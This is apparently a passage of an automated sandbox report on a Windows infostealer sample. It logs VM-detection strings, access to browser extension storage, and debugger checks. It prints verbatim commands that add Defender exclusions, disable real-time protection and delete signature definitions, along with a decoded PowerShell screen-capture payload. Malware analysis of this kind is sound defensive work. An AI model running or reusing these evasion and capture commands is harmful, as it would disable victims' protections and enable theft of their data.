              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\Jump to behavior
              Source: getmac.exe, 0000003B.00000003.1853439233.000001C00657D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.1857265321.000001C006591000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853271720.000001C00656A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: getmac.exe, 0000003B.00000003.1853439233.000001C00657D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853271720.000001C00656A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: getmac.exe, 0000003B.00000003.1853439233.000001C00657D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.1857265321.000001C006591000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853271720.000001C00656A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
              Source: getmac.exe, 0000003B.00000003.1853439233.000001C00657D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.1857265321.000001C006591000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853271720.000001C00656A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2950531292.000001C1A8654000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003D.00000002.2948040188.000001C1A302B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: rar.exe, 00000053.00000002.2143104282.000001B0DE23A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: decodeqemu-ga
              Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 2Nf15vmsrvc
              Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: El9HaBFrFM.exe, 00000001.00000003.1890133432.00000250685BB000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1891694555.000002506913E000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2253348238.0000025069125000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f4vmusrvc
              Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: bound.exe, 00000012.00000002.1798455497.0000026C6CE1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\K x
              Source: rar.exe, 00000053.00000002.2143104282.000001B0DE23A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: getmac.exe, 0000003B.00000003.1853439233.000001C00657D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.1857265321.000001C006591000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853271720.000001C00656A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW_FRAGMENTATION
              Source: getmac.exe, 0000003B.00000003.1853439233.000001C00657D000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.1857265321.000001C00657E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853271720.000001C00656A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"E_STR
              Source: El9HaBFrFM.exe, 00000001.00000002.2249310602.0000025067E40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
              Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: getmac.exe, 0000003B.00000003.1852786093.000001C0065AB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853271720.000001C00656A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.1857265321.000001C0065B3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853388205.000001C0065B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExportA
              Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware)
              Source: getmac.exe, 0000003B.00000003.1852786093.000001C0065AB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853271720.000001C00656A000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.1857265321.000001C0065B3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.1853388205.000001C0065B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicerc
              Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: El9HaBFrFM.exe, 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: >f8vmware
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3AD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6BA3AD12C
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFA9E0350 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFA9E0350
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3C3480 GetProcessHeap,0_2_00007FF6BA3C3480
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3AD30C SetUnhandledExceptionFilter,0_2_00007FF6BA3AD30C
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3AC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6BA3AC8A0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3AD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6BA3AD12C
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3BA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6BA3BA614
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3AD30C SetUnhandledExceptionFilter,1_2_00007FF6BA3AD30C
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3AC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF6BA3AC8A0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3AD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6BA3AD12C
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3BA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6BA3BA614
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFA933248 IsProcessorFeaturePresent,00007FFE13341A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE13341A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFA933248
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAB2DFFC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFDFAB2DFFC
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB212B IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAAB212B
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FFDFAAB1CB7 SetUnhandledExceptionFilter,1_2_00007FFDFAAB1CB7
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F34C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,83_2_00007FF6D7F34C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F2B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,83_2_00007FF6D7F2B52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F2A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,83_2_00007FF6D7F2A66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F2B6D8 SetUnhandledExceptionFilter,83_2_00007FF6D7F2B6D8
              Source: C:\Users\user\AppData\Local\Temp\bound.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\System32\svchost.exeDomain query: code.jquery.com
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
